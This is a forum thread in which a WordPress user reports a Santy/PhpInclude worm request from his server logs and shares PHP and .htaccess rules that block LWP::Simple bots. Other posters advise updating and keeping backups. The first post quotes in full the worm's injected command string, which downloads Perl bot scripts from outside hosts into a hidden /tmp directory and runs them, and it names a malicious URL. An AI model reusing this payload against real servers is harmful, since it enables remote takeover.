Wordpress Blog Vulnerable To Attacks?

wordpress

#1

I think that the Wordpress Search Hilite 1.2 Plugin
might be susceptible to an attack because of its
"include()" and “require()” functions.

Googling around I found out that LWP::Simple/5.76 is a malicious Perl Script aka Santy.E.Worm aka the PhpInlude.Worm.

I just happened to be skimming thru my log file and found a very suspicious entry that caught my attention. Curious to find out more, I followed one of the URL’s in the log.

http://weblicious.com/.notes/ssh2.htm

DO NOT VISIT THIS LINK!
As soon as you enter it, it automatically infects your system with the Exploit-phpBB!hilight trojan.

Thought its safe to say that this trojan will not do anything malicious to your pc.

Find out more about the "Exploit-phpBB!hilight trojan here by mcafee.com

Funny I just wrote above about the Wordpress Search Hilite 1.2 Plugin.

Here are some details about this malicious bot.

----- DATE --------- IP ADDRESS -------------- USER AGENT
— 01/01 12:35 ---- 217.160.130.70 --------- LWP::Simple/5.76

Heres what caught my eye:

http://www.thekodclan.com/blog&rush=echo START; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo END&highlight=’.passthru($HTTP_GET_VARS[rush]).’’;

Note that it is apparently trying to execute a series of commands:
cd /tmp
wget

MORE INFO

Santy.C and Santy.E behave so differently from Santy.A that it has been renamed to the PhpInclude.Worm. The worm doesn’t exploit the vulnerabilities in phpBB targeted by its predecessor, instead aiming for a wider range of common programming errors in PHP Web pages. It uses search engines including Google, Yahoo and AOL to identify exploitable Web pages written in PHP that use the functions “include()” and “require()” in an insecure manner.

Vulnerable sites include those that will include just about anything with the include() command. Make sure only to include files sitting in a designated directory, or to always add an extension or a path to any include command issued on your site, and you should be in the safe. And, of course, if you don’t want the worm to eat up your bandwidth. Inlcude something like the code below to your pages.

TO STOP THE WORM USING PHP
Simply add this at the top of the index.php page:

if(eregi(“LWP::Simple”,getenv(“HTTP_USER_AGENT”),$regs) or eregi(“lwp-trivial”,getenv(“HTTP_USER_AGENT”),$regs)) {
exit;
}

Which means that if the user agent (browser) visiting identifies itself as LWP:Simple or lwp-trivial, which this worm does, with a version number attached as well, it will simply not get anyting at all from your site.

TO STOP THE WORM USING Non-PHP SITES

Simpy save this into a text file using notepad, upload to root directory and change file extension from *.txt to *.htaccess

SetEnvIfNoCase User-Agent “LWP::Simple/5.36” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.43” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.47” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.48” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.50” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.53” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.63” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.64” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.65” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.66” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.69” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.70” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.75” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.76” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.79” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.800” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.801” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.802” bad_bot
SetEnvIfNoCase User-Agent “LWP::Simple/5.803” bad_bot
SetEnvIfNoCase User-Agent “lwp-trivial/1.32” bad_bot
SetEnvIfNoCase User-Agent “lwp-trivial/1.34” bad_bot
SetEnvIfNoCase User-Agent “lwp-trivial/1.35” bad_bot
SetEnvIfNoCase User-Agent “lwp-trivial/1.36” bad_bot
SetEnvIfNoCase User-Agent “lwp-trivial/1.38” bad_bot
SetEnvIfNoCase User-Agent “lwp-trivial/1.40” bad_bot
SetEnvIfNoCase User-Agent “lwp-trivial/1.41” bad_bot

Order Allow,Deny allow from all Deny from env=bad_bot

SOME LINKS

http://wordpress.org/support/7/19285 - WORDPRESS.org

The Knights Of Death® :: An XBOX LIVE™ GAMING CLAN
http://www.thekodclan.com/


#2

Currently, every PHP app is vulnerable to this. You can further protect yourself by running the latest version of WordPress, v1.2.2, and keeping regular backups.
http://wordpress.org/development/2004/12/one-point-two-two/
http://www.tamba2.org.uk/wordpress/backup/


MacManX.com


#3

Good suggestion. Keeping backups is definetly the way to go. Backing up your databases, blog comments and entries, forums, or site period!

You cant protect yourself from every attack, so in case of emergencys your ready to rock an roll your data back to your site.

MacManX, your site “Blog” is the $#|t, I like how you change the default Wordpress template.

Im in the process of making a template for my blog, and um maybe in the future you can give me some pointers on certain php stuff.

http://www.thekodclan.com/blog

:wink:
*"The worm doesn’t exploit the vulnerabilities in phpBB targeted by its predecessor, instead aiming for a wider range of common programming errors in PHP Web pages. It uses search engines including Google, Yahoo and AOL to identify exploitable Web pages written in PHP that use the functions “include()” and “require()” in an insecure manner.

Vulnerable sites include those that will include just about anything with the include() command "*

The Knights Of Death® :: An XBOX LIVE™ GAMING CLAN
http://www.thekodclan.com/


#4

Thanks for the compliment. My theme is actually based off of Michael Heilemann’s Kubrick, with a few changes to the PHP and the overall look (via Photoshop).

If you’re interested, here’s a complete list of themes for WordPress.


MacManX.com